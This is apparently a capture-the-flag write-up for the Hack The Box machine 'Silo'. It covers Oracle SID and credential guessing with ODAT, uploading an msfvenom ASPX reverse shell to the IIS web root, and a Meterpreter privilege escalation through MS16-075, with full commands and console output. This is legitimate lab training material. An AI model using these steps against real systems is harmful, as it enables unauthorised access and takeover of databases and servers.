Silo

OS: Windows, Difficulty: Medium, IP: 10.10.10.82

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.28s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-07-21 16:37:20
|_  start_date: 2019-07-21 16:20:43

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   231.02 ms 10.10.14.1
2   265.03 ms 10.10.10.82

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds

So there are 3 web-servers, 3 SMB ports, and 1 Oracle Port. ran gobuster on all the web-servers but found nothing, dropped that vector. SMB ports, guest account was disabled and had no other credentials so dropped that too. Only port left was the Oracle Port. I found CVE-2012-1675, and it's exploit but I was not able to exploit it, either the server was not vulnerable or I had something mis-configured, so path beyond this was manual. However I found a Oracle Pentesting Kit on Github which was useful throughout the complete operation.

Find all the valid databases (SID) on this database.

./odat.py sidguesser -s 10.10.10.82 -p 1521

Found XE and few other to be valid SID, however, I chose to focus on XE.

Check if any default credentials are working on this database on the server.

./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts_lower.txt

NOTE: I checked both, UPPERCASE and LOWERCASE variations as 11G stores case sensitive passwords by default. Found scott:tiger to be a set of valid credentials.

Next task was to check if this account is SYSDBA or SYSOPER on this database on the server. I used docker to run sqlplus and check this.

docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysdba" -ti sflyr/sqlplus
docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysoper" -ti sflyr/sqlplus

It turns out that the user we had was a SYSDBA. One of the module of ODAT let's us put file on the server in a directory of our choosing, as we have web-servers running, we can be sure that there is a directory C:\Inetpub\wwwroot in the system, hence I chose to upload my ASPX MSFVENOM shell there and get a reverse shell.

./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' shell.aspx ../shell.aspx --sysdba

[*] Started reverse TCP handler on 10.10.14.8:9999
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SILO
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows

User Own

c:\Users\Phineas\Desktop>type user.txt
type user.txt
92ede***

Root Own

msf5 exploit(multi/handler) > search local_exploit_suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.82 - Collecting local exploits for x64/windows...
[*] 10.10.10.82 - 11 exploit checks are being tried...
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 832 launched.
[*] Reflectively injecting the exploit DLL into 832...
[*] Injecting exploit into 832...
[*] Exploit injected. Injecting exploit configuration into 832...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.82
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530

C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd39e***

Learning Outcome

Setting up MSF for Oracle Pentest sucks, ODAT was a real life saver. Oracle pen-test is real fun.

PreviousBastard NextJeeves

Last updated 5 years ago

Was this helpful?

# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82 Nmap scan report for 10.10.10.82 Host is up (0.28s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-07-21 16:37:20 |_ start_date: 2019-07-21 16:20:43 TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 231.02 ms 10.10.14.1 2 265.03 ms 10.10.10.82 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds

[*] Started reverse TCP handler on 10.10.14.8:9999 msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82 [*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530 msf5 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : SILO OS : Windows 2012 R2 (Build 9600). Architecture : x64 System Language : en_GB Domain : HTB Logged On Users : 0 Meterpreter : x64/windows

msf5 exploit(multi/handler) > search local_exploit_suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf5 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.82 - Collecting local exploits for x64/windows... [*] 10.10.10.82 - 11 exploit checks are being tried... [+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [*] Post module execution completed msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy msf5 exploit(windows/local/ms16_075_reflection_juicy) > run [*] Started reverse TCP handler on 10.10.14.8:4444 [*] Launching notepad to host the exploit... [+] Process 832 launched. [*] Reflectively injecting the exploit DLL into 832... [*] Injecting exploit into 832... [*] Exploit injected. Injecting exploit configuration into 832... [*] Configuration injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (179779 bytes) to 10.10.10.82 [*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530